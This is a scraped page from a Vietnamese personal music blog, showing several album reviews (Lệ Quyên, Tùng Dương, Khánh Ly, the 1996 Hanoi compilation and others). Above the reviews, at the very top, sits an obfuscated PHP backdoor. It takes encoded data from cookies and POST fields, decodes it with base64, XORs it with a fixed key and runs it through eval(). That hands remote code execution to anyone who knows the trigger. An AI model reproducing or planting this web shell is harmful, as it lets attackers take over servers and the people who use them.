$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> review – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: review (page 1 of 4)

Lệ Quyên – Vùng Tóc Nhớ

“Vùng Tóc Nhớ” là album mới nhất của Lệ Quyên, toàn bộ album đều là những Bài-không-tên của Vũ Thành An.

Mình không ấn tượng với bất cứ bài nào trong album này. Bài nào cũng nghe chỉ đạt ở mức tầm tầm. Cơ mà vẫn note vì chắc đây là album hát lời bảo đảm chính xác nhất các bài của Vũ Thành An, vì đích thân nhạc sĩ chỉnh từng từ của bài hát nếu sai. Khá thú vị.

Có một điều là “Bài không tên cuối cùng”, lời mà bất cứ ca sĩ nào cũng hát là

Mưa bên chồng có làm em khóc, có làm em nhớ
Những khi mình mặn nồng

thì theo Vũ Thành An là sai lời, phải là “những khi tình còn nồng” mới đúng. Và có lẽ Lệ Quyên là một trong số hiếm hoi hát “đúng” lời này.

Nhưng thế lại làm mất cái hay của bài hát. Bài này ban đầu là “những khi mình mặn nồng”. Đúng với tâm trạng của một chàng trai trẻ đang khi yêu đường đang mặn nồng nhất thì người yêu cất bước ra đi. Chỉ là sau này, Vũ Thành An lo bài hát ảnh hưởng đến cô người yêu cũ, làm phá hoại hạnh phúc gia đình người ta, ông mới muốn đổi thành “tình còn nồng”.

Dĩ nhiên, tôn trọng nhạc sĩ thì nên hát như thế, cơ mà mình vẫn thấy hát kiểu các ca sĩ cũ hay hơn.

Ngoài điểm nho nhỏ đó thì mình thấy album này chẳng có gì đáng để tâm cho lắm. Xin lỗi chị Quyên hehe, em vẫn yêu chị nhưng mà phải nói thế.

Bằng Kiều ft. Đình Bảo ft. Thiên Tôn – Đời Đá Vàng

Album mới nhất (?) của Thuý Nga Paris By Night quy tụ 3 giọng ca nam được xem là ‘sang trọng’ ở làng nhạc hải ngoại hiện tại. Cả 3 đều là những tên tuổi có qua ‘trường lớp’ và nằm trong lớp ca sĩ để đánh vào dòng nhạc trữ tình xưa của Thuý Nga. Mình đánh giá sự kết hợp này của Thuý Nga là hay hết sức. 3 giọng ca đều đẹp, nhưng đẹp theo những cách khác nhau, với những âm vực khác nhau mà khi kết hợp lại trong cùng một bài nhạc, sẽ tạo nên sự mới lạ. Ở Bằng Kiều đó là giọng giả thanh the thé (falsetto), Đình Bảo là chất giọng Baritone còn Thiên Tôn là Tenor ấm áp.

Và như đã nói ở trên, sự kết hợp này đẹp và mang lại sự hứng thú cho người nghe.

Dĩ nhiên, việc hát những bài mà bài nào cũng đã không ít thì nhiều gắn liền với tên tuổi của một hoặc hai danh ca là không dễ dàng. Hát giống kiểu cũ thì bị cho là rập khuôn, hát quá xa lạ thì sẽ bị các con giời ném đá là hiếp dâm bài hát. 3 anh ca sĩ của chúng ta chọn cách tiếp cận mạo hiểm vừa đủ, có những chỗ mới lạ gây hứng thú cho người nghe, nhưng nhìn chung không đi xa quá với những gì người nghe đã quen thuộc bao năm qua.

Nói về Thiên Tôn đi. Mình chú ý tới anh này ngay khi ảnh xuất hiện lần đầu ở Paris By Night, dù khi đó ảnh không thật sự xuất sắc lắm. Thậm chí album đầu của riêng ảnh, mình nghe thấy hay nhưng cũng không quá mức outstanding. Tuy nhiên, trong album này, Thiên Tôn really steps up his game, man. Giọng ảnh hoàn toàn không bị lép vế so với giọng anh Kiều hay Đình Bảo, nếu không muốn nói ở vài chỗ còn vượt hẳn.

Album có những bài mà mình nghe đi nghe lại không chán, như ‘Đời Đá Vàng’ hay ‘Nghìn Trùng Xa Cách’ được phối lại theo hướng thính phòng, và đặc biệt là ‘Tình Khúc Cho Em’ – một ca khúc khó hát của Lê Uyên Phương.

Có những lúc lãng đãng thoáng qua, nghe Đình Bảo tựa như một Tuấn Ngọc khi còn trẻ, lịch lãm không tả. Đó cũng là một điểm nhấn lí thú. Một điểm nữa là ‘Hạ Trắng’ hát phiêu phiêu theo kiểu blue, với Bằng Kiều nhấn nhá ‘nắng’ và ‘suốt’ rất lãng đãng.

Album bị điểm trừ khá khó chịu, đó là các ca sĩ hát sai lời ở vài chỗ. So far thì có Đình Bảo trong ‘Mắt lệ cho người’ hát sai câu ‘và lệ em ngấn trên mi nhạt’ thành ‘ngất’ trên mi nhạt, nghe chẳng ra sao. Hay ‘ôm tiếng hát không tâm linh’ bị hát sai thành ‘ôm tiếng hát trong tâm linh’ ở bài Tình khúc cho em…

Phạm Thu Hà – Tựa như gió phiêu du

Năm nay heo hút quá, nhạc Việt chả được mấy album cho ra hồn nên nhìn chung mình cũng lười nghe. Đến cuối tuần rồi quay lại xem dạo gần đây có album nào hay không, thì đào được vài album, trong đó có album này. Nghe rất được.

Giọng Phạm Thu Hà nghe thoáng qua có vẻ rất giống Nguyên Thảo, nhưng đi về hướng điêu luyện và sang trọng, trong khi Nguyên Thảo tình cảm dạt dào hơn. Ít ra đó là những cảm nhận đầu tiên của mình khi nghe Thu Hà hát hơn 2 năm trước trong Classic Meets Chillout. Cá nhân mình khi đó đánh giá không cao Thu Hà, dù có phần khá nể vì bạn này chơi crossover vốn là một con đường khó nhằn hơn so với chọn ballad pop dễ dàng như nhiều ca sĩ trẻ khác.

Nói ngắn gọi, thì theo mình, Classic Meets Chillout và giọng hát Thu Hà ngày đó kĩ thuật và khô khan. Trước khi nghe album ‘Tựa như gió phiêu du’ này, mình khá háo hức để xem cô ca sĩ sau 2 năm có giải quyết được vấn đề này không. Nghe đi nghe lại vài lần, thì đúng là không thất vọng.

‘Nàng thơ mới của Đức Trí’ – come on, báo chí khi viết về album này chẳng hiểu sao lại cứ thích đánh mạnh vào 2 chữ ‘Đức Trí’ này. Đồng ý Đức Trí góp phần rất lớn trong việc sản xuất album, cùng những sáng tác của anh, nhưng sự vượt trội lên hẳn là giọng hát của Thu Hà. Vẫn còn cái vẻ sang trọng vốn có của một giọng hát thính phòng, nhưng nếu nghe kĩ, thỉnh thoảng vẫn có thể nghe được cái run rẩy đầy tinh tế.

Trong album này, những bài Thu Hà hát đạt nhất là những bài của Đức Trí sáng tác, có những sáng tác Đức Trí viết riêng để tặng Thu Hà, có sáng tác của Đức Trí mà ngoài Thu Hà ra chưa ai trình bày. Nhưng mình để ý nhất là 3 ca khúc:
– Giọt lệ thiên thu
– Suối mơ
– Bài hát ru anh

Thu Hà trình bày ‘Giọt lệ thiên thu’ của Trịnh không qua được Khánh Ly & Hà Trần, hát ‘Suối mơ’ không bằng Ánh Tuyết, ‘Bài hát ru anh’ không hơn được cái bóng quá lớn của Thanh Lam, nhưng 3 ca khúc đó lại là 3 ca khúc (theo mình) là đáng để ý nhất của cô trong album. Nó không hay tròn trịa, nhưng hay vừa đủ, vừa lạ (có thể nhờ crossover) để có thể nhớ, có thể khen, nhất là trong tình trạng ảm đạm của nhạc Việt gần đây.

Tình khúc Phạm Duy – Ngậm ngùi

Album nhạc xưa bắt đầu tuần mới này của mình. Trong album toàn những cái tên quen thuộc gắn bó với Phạm Duy, những người trong đại gia đình của ông, những người gắn liền với nhạc của ông, được hoà âm bởi phù thuỷ âm thanh Duy Cường (cũng là con trai ông).

Người ta có vẻ đánh giá không cao Duy Quang, chứ mình thấy Duy Quang hát rất được. Giọng hát của Duy Quang điềm đạm và chững chạc, buồn một cách chậm chạp; giọng của Thái Hiền thì tha thiết, dịu dàng, thủ thỉ và quý phái.

Nói chung album nghe hay, có nhiều bài, ví dụ bài “Chuyện tình buồn” của Duy Quang, chắc trong đĩa này hát thuộc loại đạt nhất; nhưng mình thích nhất vẫn là “Đưa em tìm động hoa vàng” mà Thái Hiền hát. Đó giờ bài này giọng nam nổi nhất dĩ nhiên là Sĩ Phú, giọng nữ hát nổi nhất là Thái Thanh. Thật ra Thái Hiền trình bày nhạc phẩm này có những điểm hay khác Thái Thanh. Giọng Thái Thanh nổi tiếng chua và rền, nghe Thái Thanh hát “Đưa em tìm động hoa vàng” cứ có cảm giác hoang vu, tiếng vọng về từ một miền xa xăm nào đó; nghe Thái Hiền hát thì thấy lại nhẹ tựa gió thoảng, mây trôi.

Kinh khổ – Khánh Ly & Trầm Tử Thiêng

Album được repeat liên tục trong tuần rồi của mình. Một trong những album xuất sắc nhất của Khánh Ly, và cũng là một trong những album nhạc Trầm Tử Thiêng hay nhất.

Trước năm 75 và mãi tận đến bây giờ, không ai hát “Kinh Khổ” hay được như Khánh Ly, hay nói rộng ra, không ai hát về nỗi đau của thời cuộc được như Khánh Ly. Mình nghĩ “Kinh khổ” hay không kém gì các bài hát viết về cùng đề tài của nhạc sĩ Trịnh Công Sơn. Đây xứng là một trong những bài hát bất hủ trong nền âm nhạc Việt Nam trước năm 1975 smile emoticon

Có những bài trong album này mình thích nghe các ca sĩ khác hát hơn – và cũng nghĩ rằng họ hát hay hơn (Hối tiếc – Ngọc Lan, Mười năm yêu em – Elvis Phương, Tưởng niệm – Tuấn Ngọc…), nhưng nhìn chung lại thì mình thích album này.

Tùng Dương – Độc Đạo (2013)

Cùng với “Giấc mơ mang tên mình” của Khánh Linh, “Độc đạo” của Tùng Dương là số ít album tôi trông chờ nhất trong năm 2013 rồi. Chờ mãi album của Tùng Dương phát hành từ cuối năm 2013, đến giờ tôi mới có dịp nghe.

Trong phải cả vài năm nay, như là công thức, mỗi lần muốn tìm chút gì đó lãng đãng phiêu, tôi lại nghe Tùng Dương hát. Dương là nam ca sĩ hiếm hoi có quá nhiều bài nghe đủ khiến tôi run cả người vì thích thú, dù nghe bao nhiêu lần đi nữa.

Sau “Li ti” năm 2010, chờ 2 năm để rồi thất vọng nhẹ với “Tùng Dương hát tình ca”, tôi đón nhận “Độc đạo” với một tâm lí khá dè dặt. Tôi cứ e rằng, Dương ‘thể nghiệm’ nhiều quá, đã không còn là một Tùng Dương của cái thuở giản quái dị mà ma mị như trước nữa.

Thật khó nói về “Độc đạo”. Khó đến mức trong cả 2 tuần nay, tôi nghe đi nghe lại album nhiều lần, mà vẫn không biết phải có đánh giá sao về album này. Chắc cũng phải lâu rồi mới nghe được album nào mà nếu chú tâm nghe, có thể hình dung ra, album như có đến 3 Tùng Dương khác nhau: một Tùng Dương chững chạc, một Tùng Dương run rẩy và một Tùng Dương gai góc thử nghiệm.

[Cái đoạn viết lí giải tại sao tôi lại thấy đến 3 Tùng Dương trong chỉ một album, sau khi đọc lại, tôi cảm thấy mình nên gạch bỏ đi. Vì theo tôi cái này là điểm hay nhất của album (trừ những bài tôi nói dưới đây), hi vọng mỗi người nghe sẽ có một cảm nhận khác nhau.]

Nếu không có những bài hát tiếng Anh, thì có lẽ tôi sẽ đánh giá album này ở mức 7.5/10. Các bài tiếng Anh trong album này rất ‘vô duyên’, từ cách phối nhạc cho tới cách trình bày. Thử lấy All Is Full Of Love của Björk ra làm ví dụ đầu tiên. Đây là ca sĩ mà Tùng Dương từng bảo là anh rất thích, nhưng tôi có cảm giác anh chỉ gắng chạm vào phần kĩ thuật, mà không đến được cái hồn của bài hát. Tiếng nhạc điện tử trong bản phối của Dương lạc hẳn. Không! Bài này đâu có liêu trai đến thế, và Dương cũng đâu cần điệu đà trong từng chữ đến thế. Có thể thấy Dương định bắt chước Björk ở cách nhả chữ, đặc biệt những chữ ‘love’. Nhưng Dương trình bày chau chuốt quá mức và đơn điệu vô hồn. Nghe tới khúc Dương hát ‘your phone is off the hook/ your doors are all shut’ là thấy không ổn và phải bấm next ngay rồi.

Và cũng xin không nói thêm về một trong những bài hay nhất của Bob Marley ‘Redemption Song’, qua bản phối của Tùng Dương đã biến đổi ‘lạ’ thế nào. Nghe mà tôi cứ phải tự hỏi: Bob Marley thì có liên quan quái gì đến các thầy pháp người da đỏ đâu, sao Dương hát cứ như người ta đang làm lễ như thế.

[Lại cắt bớt đoạn chê].

Nhìn chung album này vẫn có những bài thật đỉnh của Tùng Dương, những bài mà đẳng cấp của anh thể hiện rõ nhất, nhưng vẫn còn đó những bài khiến người nghe như tôi phải băn khoăn, anh đang đi loanh quanh đâu trên con đường tìm phong cách cho mình hoài thế?

Hà Nội, mùa vắng những cơn mưa – 1996

Hà Nội – cái tên chỉ cần vang lên thôi đã vương mùi xúc cảm, chỉ đọc thơ thôi đã thấy nao lòng, huống hồ lại là Hà Nội dịu dàng và e ấp vang lên trong từng nốt nhạc. Từ hàng chục năm nay, không biết đã có bao nhiêu bài hát, bao nhiêu album được viết về, được thực hiện về Hà Nội. Khó có thể để ai đó trả lời câu hỏi: album nào về Hà Nội là hay nhất? Nhưng nếu bảo album nào được nhiều người yêu thích nhất, chắc không album nào qua được “Hà Nội, mùa vắng những cơn mưa”, album được phát hành vào năm 1996 – nghĩa là gần 20 năm về trước.

Album này ngày đó gây tiếng vang trên cả nước, cả khắp 3 miền, các định dạng như Cát-xét, VHS, hay đĩa CD đều bán sạch. Album này là một trong số những album Việt Nam đầu tiên được làm ở Mỹ, sau được tái bản vô số lần ở Việt Nam, và sau gần 2 thập kỷ vẫn hot đến mức gần đây người ta quyết định tung ra bản vinyl đĩa than của album này (cộng thêm vài bài mới).

Ở đây, chỉ xin nói về album năm 1996 – album về Hà Nội mà tôi đã yêu thích từ rất lâu, kể từ lúc tôi biết phải lòng cô gái Hà Nội đầu tiên…

Đầu tiên, phải nói về thời điểm ra mắt của album này. Đầu thập kỷ 1990, làng nhạc Việt Nam rất ảm đạm với sự xuất ngoại lẫn im hơi lặng tiếng của hàng loạt ca sĩ nổi tiếng, như Thanh Lan ở trong Nam, hay Lệ Quyên (nữ hoàng nhạc nhẹ thập niên 80) cùng Ái Vân ở ngoài Bắc. Phải đến tầm vài năm sau đó, khi phong trào nhạc nhẹ lên mạnh với sự xuất hiện của các tên tuổi ca sĩ đầy tiềm năng: band Phương Đông với trụ cột là cặp Quốc Trung, Thanh Lam; band Hoa Sữa với tài năng trẻ mới tỏa sáng Mỹ Linh; band Trắng Đen với cặp song ca Phương Thảo – Ngọc Lễ… thì từ đó làng nhạc Việt Nam mới dần khởi sắc và phát triển mạnh.

Lại lướt qua những năm kế tiếp, những năm rất rực rỡ trong làng nhạc nhẹ Việt Nam, để nhảy thẳng tới năm 1996, năm phát hành album tôi đang nói ở đây.

Năm 1996 là một trong những năm hoàng kim trong làng âm nhạc Việt Nam, khi “Trung tâm băng nhạc Trẻ” – vốn đang nổi như cồn với seri “Mưa bụi” – mà những ai mê nhạc vàng trong Nam ngày đó ắt hẳn biết, quyết định mời hầu như toàn bộ những ca sĩ nổi tiếng nhất thời bấy giờ để thực hiện album. Và những gì sau đó đã thành lịch sử. “Hà Nội mùa vắng những cơn mưa” trở thành album đạt kỷ lục về lượng đĩa tiêu thụ.

Album nổi tiếng đến mức có nhiều bài trong đó gắn với tên tuổi ca sĩ thể hiện bài đấy luôn, sau này khó kiếm được ai trình bày qua được. Có thể nhắc đến sau đây…

Mỹ Linh với “Hà Nội đêm trở gió” và “Chị tôi” – 2 ca khúc đều là nhạc trong phim và trong kịch. Mỹ Linh hát “Chị tôi” hay đến mức sau này cứ nhắc đến câu “Thế là chị ơi, rụng bông hoa gạo…” là người ta nghĩ đến giọng hát Mỹ Linh.

“Hà Nội, mùa vắng những cơn mưa” trước đã được ca sĩ Thanh Tâm thể hiện, nhưng chỉ gây được tiếng vang và bùng nổ qua giọng hát của Cẩm Vân.

Hay bài “Chiều phủ Tây Hồ” với giọng hát NSND Lê Dung. Bài này vẫn không ai thể hiện được đến mức như thế (dù sau này giọng đầy nội lực của Ngọc Anh, hay giọng rất phiêu và dị của Tùng Dương). Nghe mới thấy cái giọng tự sự, buồn man mác của Lê Dung hợp với cái không khí Hà Nội cũ trong thơ ca thế nào.

Những bài khác trong album, từ “Hoa sữa” gắn với tên tuổi Thanh Lam, “Hà Nội và tôi” do NSND Trung Đức thể hiện, hay “Lãng đãng chiều đông Hà Nội” với giọng ca của Thu Hà (Thu Hà nổi tiếng hát nhạc Văn Cao, Đoàn Chuẩn… chứ không phải Trần Thu Hà)… đều trên cả tuyệt vời.

Hà Nội ngày xưa sao thì tôi không biết, có thể thay đổi nhiều, có thể vẫn nằm đó, chỉ biết rằng mỗi lần nghe lại album này, tôi lại thấy trong tôi hiện lên cái cảm giác bỡ ngỡ của một thằng con trai miền Nam khi lần đầu tới thăm Hà Nội: hay và đẹp đến ngỡ ngàng.

Nhanh thật, mới đó mà…

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.